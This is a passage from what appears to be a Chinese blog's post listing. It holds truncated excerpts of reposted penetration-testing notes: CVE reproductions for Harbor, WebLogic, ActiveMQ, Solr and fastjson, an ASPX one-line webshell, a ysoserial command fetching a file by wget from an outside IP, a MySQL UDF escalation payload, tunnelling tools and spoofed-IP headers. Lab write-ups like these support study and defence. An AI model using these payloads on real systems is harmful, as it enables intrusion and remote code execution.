自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(42)
  • 收藏
  • 关注

转载 linux就该这么学--资料整理--持续更新

基础命令服务管理systemctl redhat7systemctl start foo.service 启动服务systemctl restart foo.service 重启服务systemctl stop foo.service 停止服务systemctl reload foo.service 不重启服务下重新加载配置文件systemctl status foo.se...

2019-09-29 22:52:00 709

转载 IPC$渗透使用

来源:https://www.cnblogs.com/sstfy简介IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。使用条件1.开放了139、445端口;2.目标开启ip...

2019-09-26 22:30:00 235

转载 DNS隧道--dnscat2

安装服务端 git clone https://github.com/iagox86/dnscat2.git cd dnscat2 cd server sudo gem install bundler bundle install客户端 git clone https://github.com/iagox86/dnscat2.git cd dnscat2/cli...

2019-09-25 10:06:00 810

转载 icmp隧道--icmpsh

本地:ubantu目标主机:windows在ubantu上关闭自带的icmp回应sysctl -w net.ipv4.icmp_echo_ighore_all=1ubantu上启动pip install impacketpython icmpsh_m.py ubantuIP WindowsIPwindows上icmpsh.exe -t UbantuIP详细命令-t...

2019-09-24 14:56:00 289

转载 泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041

靶机影响版本 泛微e-cology<=9.0https://github.com/jas502n/e-cology部署复现/weaver/bsh.servlet.BshServletPOCexec("whoami")这是BeanShell命令的其他一些示例source(),run()-将bsh脚本读入该解释器,或在新的解释器中运行frame()-在Frame...

2019-09-23 21:49:00 649

转载 Harbor任意管理员注册漏洞复现CVE-2019-16097

注册时抓包添加poc"has_admin_role":true管理员权限POCPOST /api/users HTTP/1.1Host: 127.0.0.1Content-Length: 131Accept: application/jsonOrigin: http://127.0.0.1User-Agent: Opera/9.80 (Windows NT 6....

2019-09-21 10:24:00 253

转载 ashx后门[转]

https://www.cnblogs.com/Fluorescence-tjy/p/9855828.html一、标准ASPX一句话木马.NET平台下的一句话木马则百年不变,最常见的当属下面这句<%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>想必这句话已经成大多数防御...

2019-09-19 09:25:00 336

转载 CVE-2017-3248简单复现

我是这样操作的目标跟windows在一个段,linux是另一个段的,我的虚拟机windows主机上`java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt"linux虚拟机上执行python exploit-C...

2019-09-17 15:14:00 872

转载 一个文件下载

起因一次授权的渗透测试两个文件下载页面http://xxx/informationCollect/lawDepartmentCollect/download?filePath=D:\xxx\xxx\xxx\upload\xxx.docx&realName=dama1.jsp这个很简单了,修改D:\xxx\xxx\xxx\upload\xxx.docx 即可用dama1.j...

2019-09-12 17:02:00 203

转载 CVE-2019-0708简单复现

各文件对应位置rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rbrdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.dbcve_2019_0708_bl...

2019-09-09 10:57:00 155

转载 CVE-2018-3246 weblogic xxe

使用P牛2018-2894的容器http://192.168.245.130:7001/ws_utc/begin.do导入测试用例上传时抓取数据包POST /ws_utc/resources/ws/config/import?timestamp=1566895391388 HTTP/1.1Host: 192.168.245.130:7001Content-Length: ...

2019-08-27 16:58:00 1541

转载 Imagetragick 命令执行漏洞(CVE-2016–3714)

POST /upload.php HTTP/1.1Host: your-ipContent-Length: 315Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (K...

2019-08-23 14:39:00 278

转载 ElasticSearch 命令执行漏洞(CVE-2014-3120)

POST /_search?pretty HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-...

2019-08-14 08:53:00 341

转载 ActiveMQ 反序列化漏洞(CVE-2015-5254)

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.245.130 61616未创建查看,点击消息列队,需登录http://192.168.245.130:8161/admin/browse.jsp?JMSDestination=event...

2019-08-12 11:27:00 351

转载 Apache Solr 远程命令+XXE执行漏洞(CVE-2017-12629)

Apache Solr 最近有出了个漏洞预警,先复习一下之前的漏洞命令执行先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数POST /solr/demo/config HTTP/1.1Host: your-ipAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatib...

2019-08-09 14:58:00 715

转载 Apache Shiro RememberMe 1.2.4 反序列化漏洞

拉取镜像docker pull medicean/vulapps:s_shiro_1启动环境docker run -d -p 80:8080 medicean/vulapps:s_shiro_1拉取镜像中.....呵呵 ! 网太慢,有时间再弄转载于:https://www.cnblogs.com/mrhonest/p/11320498.html...

2019-08-08 12:54:00 1600

转载 ActiveMQ任意文件写入漏洞(CVE-2016-3088)

上传webshell容器用vulhub的PUT一个jsp文件MOVE到api目录默认的ActiveMQ账号密码均为admin,首先访问http://your-ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:访问其它利用方法--转写入crontab,自动化弹shell这是一个比较稳健的方法。首先上传...

2019-07-30 13:50:00 383

转载 fastjson<1.2.47 RCE 漏洞复现

环境搭建:jdk版本:jdk-8u112-windows-x64https://raw.githubusercontent.com/yaofeifly/vulhub/master/fastjson/vuln/fastjson-1.0.wartomcat部署war包编译exploit.java然后将编程的exploit.class放到http服务器根目录下...

2019-07-18 16:31:00 176

转载 Redis基于主从复制的RCE(redis4.x 5.x)复现

使用docker建立redis拉取镜像运行查看可以连接,存在未授权https://github.com/Ridter/redis-rce发送poci:正向连接r:反弹反弹成功转载于:https://www.cnblogs.com/mrhonest/p/11162735.html...

2019-07-10 11:21:00 250

转载 Nginx与安全有关的几个配置

隐藏版本号http{server_tokensoff;}经常会有针对某个版本的nginx安全漏洞出现,隐藏nginx版本号就成了主要的安全优化手段之一,当然最重要的是及时升级修复漏洞开启HTTPSserver{listen443;server_nameops-coffee.cn;sslon;ssl_certificate...

2019-06-28 08:39:00 105

转载 随笔1

到了现在这个年纪,确实谁都不想再取悦了,跟谁在一起舒服就和谁在一起,包括朋友也是,累了我就躲远一点,你喜欢我,我喜欢你,那么我们就在一起,如果我们都不喜欢就不要勉强,已经过了那个你不喜欢我我也非要喜欢你的年纪,更多的是,如果你喜欢我,那我也试着喜欢你好了。转载于:https://www.cnblogs.com/mrhonest/p/11096393.html...

2019-06-27 13:13:00 51

转载 随笔2

世界上最糟糕的事情之一,就是你觉得自己配不上你喜欢的那个人,就像两个人并肩站在下雨天的屋檐下,你不敢先开口说‘一起走吧’,因为你连伞也没有转载于:https://www.cnblogs.com/mrhonest/p/11096398.html...

2019-06-27 13:13:00 76

转载 随笔

机场比婚礼的殿堂见证了更多真诚的吻医院的墙比教堂听到了更多的祈祷转载于:https://www.cnblogs.com/mrhonest/p/11096378.html

2019-06-27 13:04:00 75

转载 Linux下rsync的安装及简单使用

2018-09-25 15:39:04一、RSYNC安装环境:centos6.5 iptables关闭和selinux为disabled源码安装:到rsync官网下载rsync源码安装包,上传到服务器上,或者wget下载。解压rsync源码安装包进入解压后的目录,执行./configure --prefix=/usr/local/rsync编译配置完成后,执行make &a...

2019-06-03 13:32:00 423

转载 IPv6 三个访问本地地址的小Tips

最近发现家里宽带支持IPv6了,这里分享三个利用IPv6访问本地地址(内网地址)的方法。通常来说,我们用localhost来代表本地地址127.0.0.1。其实在IPv6中有他自己的表示方法ip6-localhost:另外,大家应该都知道xip.io这个服务,可以将任何IP地址用域名的形式表示,用来测试SSRF漏洞比较方便。但xip.io只支持IPv4,IPv6下也有个类似的服务,ip6...

2019-05-29 17:45:00 932

转载 安装VMware,出现Microsoft Runtime DLL 安装程序未能完成安装,解决方法

安装VMware Workstation 12 Player出现如下问题:    解决方法:    1.出现这个问题的时候不要点确定(如果点了确定,会找不到步骤4中的文件夹)    2.win+R调出 '运行'        3.输入%temp%,进入C:\Users\ADMINI~1\AppData\Local\Temp    4.找到类似文件夹{537B7F85-2B95-44ED-...

2019-05-29 08:23:00 274

转载 linux mysql udf 提权

连接远程数据库查看插件库路径show variables like '%plugin%';写入udf库到插件目录:select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...

2019-05-09 09:28:00 681

转载 XXE漏洞学习

XXE漏洞学习0x00 什么是XML1.定义XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。2.文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。...

2019-05-08 14:31:00 170

转载 了解Metasploit中的Payloads(有效载荷)

什么是payload?payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。也有人把payloads称为shellcode。Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。payloa...

2019-05-07 13:01:00 2711

转载 Metasploit 如何使用Exploits(漏洞)

在Metasploit中选择一个漏洞利用程序将'exploit'和'check'命令添加到msfconsole。msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_indexmsf exploit(ms09_050_smb2_negotiate_func_index) > help...略......

2019-05-07 12:48:00 1640

转载 Metasploit 使用MSFconsole接口

什么是MSFconsole?该msfconsole可能是最常用的接口使用Metasploit框架(MSF)。它提供了一个“一体化”集中控制台,并允许您高效访问MSF中可用的所有选项。MSFconsole一开始似乎很吓人,但一旦学习了命令的语法,您将学会体会利用此接口的强大功能。使用MSFconsole的好处:它是访问Metasploit中大部分功能的唯一支持方式。...

2019-05-06 14:49:00 847

转载 Metasploit 模块和位置

Metasploit Framework由许多的模块组成的。一、Exploits(漏洞模块)定义为使用“有效载荷(payloads)”的模块没有“有效载荷”的攻击是辅助模块二、Payloads, Encoders, Nops(有效载荷,编码器,空指令模块)“有效载荷”由远程运行的代码组成”编码器“确保“有效载荷”到达目的地“Nops”保...

2019-05-06 14:41:00 741

转载 Nmap速查手册

0×00:说明只是一个快速查询手册,理论的东西都没有补充,欢迎大家积极在评论区补充自己常用的参数,O(∩_∩)O0×01:NMAP功能介绍1.主机存活检测2.端口探测3.服务识别4.操作系统识别5.硬件地址检测6.服务版本识别7.漏洞扫描,使用nmap自带脚本0x02的简单示例使用平检测10.0.0.0/24这个网段#...

2019-02-21 10:52:00 329

转载 Linux常用命令大全(非常全!!!)

from:https://www.cnblogs.com/yjd_hycf_space/p/7730690.html最近都在和Linux打交道,感觉还不错。我觉得Linux相比windows比较麻烦的就是很多东西都要用命令来控制,当然,这也是很多人喜欢linux的原因,比较短小但却功能强大。我将我了解到的命令列举一下,仅供大家参考:系统信息arch 显示机器的处理器架构(...

2019-02-02 20:38:00 121

转载 Web中常见的绕过和技巧

SQL注入十六进制绕过引号slect table_name from information_schema.table where table_schema="sqli";slect table_name from information_schema.table where table_schema=0x73716c69;slect table_name fro...

2019-02-02 20:29:00 1418

转载 windows安装vscode,配置golang环境

出现的问题:进行如下命令进行目录切换:cd %GOPATH%\src\github.com\golang我这里的GOPATH是在D:\GoPath,大家这里一定要注意些如果src目录下面没有github.com\golang文件夹请自行创建完成目录切换后,开始下载插件包,在切换后的目录下进入命令行界面,可以用git bash:git clonehttps://gith...

2019-02-02 12:54:00 86

转载 Windows内网渗透提权的几个实用命令

这不是一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。1.获取操作系统信息识别操作系统名称及版本:C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"OS Name: Microsoft Windows 10 ProOS V...

2019-02-01 14:36:00 252

转载 伪造ip头

x-forwarded-for: 127.0.0.1x-remote-IP: 127.0.0.1x-remote-ip: 127.0.0.1x-client-ip: 127.0.0.1x-client-IP: 127.0.0.1X-Real-IP: 127.0.0.1client-IP:127.0.0.1x-originating-IP:127.0.0.1x-remote-addr:12...

2019-01-24 13:15:00 650

转载 SSL和TLS漏洞验证

工具下载:git clone https://github.com/drwetter/testssl.sh.git实验环境:192.168.1.22(bee-box v1.6)  192.168.1.20(kali-linux-2017.3)一、SWEET32(CVE-2016-2183)使用3DES的任何密码都易受SWEET32影响命令:./testssl.sh -W ...

2019-01-02 21:41:00 1801

转载 Windows的哈希

Windows中有几种不同类型的哈希值,它们可能非常混乱。 可以在这两篇文章《LM, NTLM, Net-NTLMv2, oh my!》和《LM Hash and NT Hash 》找到一些解释,但首先阅读下面这段内容:如果Windows的hash没有加盐,那么两组hash将可能产出相同的明文。Windows哈希分为两组--LMhash和NTLMhash。 比如: testuser:2...

2019-01-02 09:47:00 484

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除